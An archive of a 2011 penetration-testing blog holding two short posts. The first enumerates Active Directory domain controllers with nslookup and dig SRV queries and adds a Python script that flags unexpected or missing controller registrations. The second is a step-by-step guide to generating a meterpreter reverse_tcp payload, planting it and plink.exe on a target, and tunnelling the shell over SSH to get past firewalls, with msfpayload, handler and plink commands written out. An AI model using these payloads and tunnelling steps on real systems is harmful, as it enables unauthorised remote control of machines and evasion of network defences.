Quick notes – Enumerate Domain Controllers via nslookup

12/16/2011


Let’s say you know the domain name but you would like to enumerate all domain controllers.

domain: hacking.lab.local

# Linux Backtrack 5 R1 (attacker machine)

  1. Open your Linux shell

Using nslookup (interactive session; the SRV record name is the same one queried with dig below):

nslookup
> set type=srv
> _ldap._tcp.dc._msdcs.hacking.lab.local

Using dig (displays a list of domain controllers):

dig SRV _ldap._tcp.dc._msdcs.hacking.lab.local | egrep -v '(;;)'|cut -d" " -f8 | awk NF
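As an added example (not part of the original post), the script below parses the same `dig SRV _ldap._tcp.dc._msdcs.<domain>` output without depending on space-separated columns and compares the advertised domain controllers with an expected inventory, which is the defender's use of this lookup: finding stale or unexpected DC registrations in DNS. The dig output and the hostnames in it are constructed samples.

```python
"""Parse the answer section of `dig SRV _ldap._tcp.dc._msdcs.<domain>` and
compare the advertised domain controllers with an expected inventory.
Added example, not from the original post; the dig output below is a
constructed sample and the hostnames are placeholders."""
from typing import List, NamedTuple

# Constructed dig output. dig separates the owner/TTL/class/type columns with
# tabs but the SRV data with spaces, which is what makes `cut -d" " -f8`
# fragile; str.split() treats both separators alike.
SAMPLE_DIG_OUTPUT = """\
;; QUESTION SECTION:
;_ldap._tcp.dc._msdcs.hacking.lab.local.\tIN\tSRV

;; ANSWER SECTION:
_ldap._tcp.dc._msdcs.hacking.lab.local.\t600\tIN\tSRV\t0 100 389 dc1.hacking.lab.local.
_ldap._tcp.dc._msdcs.hacking.lab.local.\t600\tIN\tSRV\t0 100 389 dc2.hacking.lab.local.
_ldap._tcp.dc._msdcs.hacking.lab.local.\t600\tIN\tSRV\t0 100 389 stale-dc.hacking.lab.local.

;; ADDITIONAL SECTION:
dc1.hacking.lab.local.\t3600\tIN\tA\t10.0.0.10
"""

class SrvRecord(NamedTuple):
    priority: int
    weight: int
    port: int
    target: str  # normalised: lower case, trailing dot removed

def parse_srv_records(dig_output: str) -> List[SrvRecord]:
    """SRV records from the answer section; ';' comment lines, the question
    line and records of other types (the A record above) are skipped."""
    records = []
    for line in dig_output.splitlines():
        fields = line.split()
        if len(fields) != 8 or fields[2:4] != ["IN", "SRV"] or line[:1] == ";":
            continue
        prio, weight, port, target = fields[4:]
        records.append(SrvRecord(int(prio), int(weight), int(port),
                                 target.rstrip(".").lower()))
    return records

def unexpected_dcs(dig_output: str, inventory: List[str]) -> List[str]:
    """Hosts advertised as DCs that are not in the known-DC inventory."""
    known = {h.lower() for h in inventory}
    return sorted({r.target for r in parse_srv_records(dig_output)} - known)

def missing_dcs(dig_output: str, inventory: List[str]) -> List[str]:
    """Known DCs with no SRV record, i.e. a missing or broken registration."""
    advertised = {r.target for r in parse_srv_records(dig_output)}
    return sorted(h.lower() for h in inventory if h.lower() not in advertised)
```

Feed it the real output of the dig command above and your DC inventory; anything returned by `unexpected_dcs` deserves a look, and anything returned by `missing_dcs` is a DC whose DNS registration needs fixing.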


Verify DNS registration for DC using nslookup: http://technet.microsoft.com/en-us/library/cc738991%28WS.10%29.aspx

Get Domain Admins Script (GDA.bat): https://github.com/nullbind/Other-Projects/tree/master/GDA


Quick notes – Get a meterpreter reverse shell through SSH tunnel

12/03/2011


Let’s say you are able to upload binaries to your target machine (via webshell, black magic, or bribes).

When you upload your meterpreter payload and run it, the firewall kills your session.

Below is a nice trick that you can pull in order to bypass evil firewalls or restrictive rules (keep in mind that sometimes you may need to change the port of your SSH server from 22 to something like 80 or 443).

In my humble opinion, meterpreter shells should never be dropped.

# Linux Backtrack 5 R1 (attacker machine)

  1. Fire up your SSH server
  2. Generate your meterpreter payload:

msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /path/msf.exe

  3. Drop msf.exe on your target
  4. Drop plink.exe on your target (the plink build from Quest PuTTY)
  5. Set up an msf handler:

color false
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost
set lport 4444
set exitonsession false
exploit -j

  • Note: Use instead of (otherwise you will have a lot of problems)

On a Mac you will have to set up an alias on the lo0 interface:

# ifconfig lo0 alias

# Windows (target machine)

  1. Connect to the SSH server and set up the port forward:

plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -L

  2. Start msf.exe

You should get a meterpreter reverse shell.


Resilient SSH Tunneled Meterpreter Session: http://pauldotcom.com/2010/03/resilient-ssh-tunneled-meterpr.html

Quest PuTTY: http://rc.quest.com/topics/putty/readme/#plinkopt

Dirty notes:


# I had issues with reverse_https, so I highly recommend reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /path/msfrev.exe

## target ##

plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -L

msfpayload windows/meterpreter/bind_tcp RHOST= LPORT=4444 X > /path/msfbind.exe

plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -R

You are currently viewing the archives for December, 2011 at hdesser.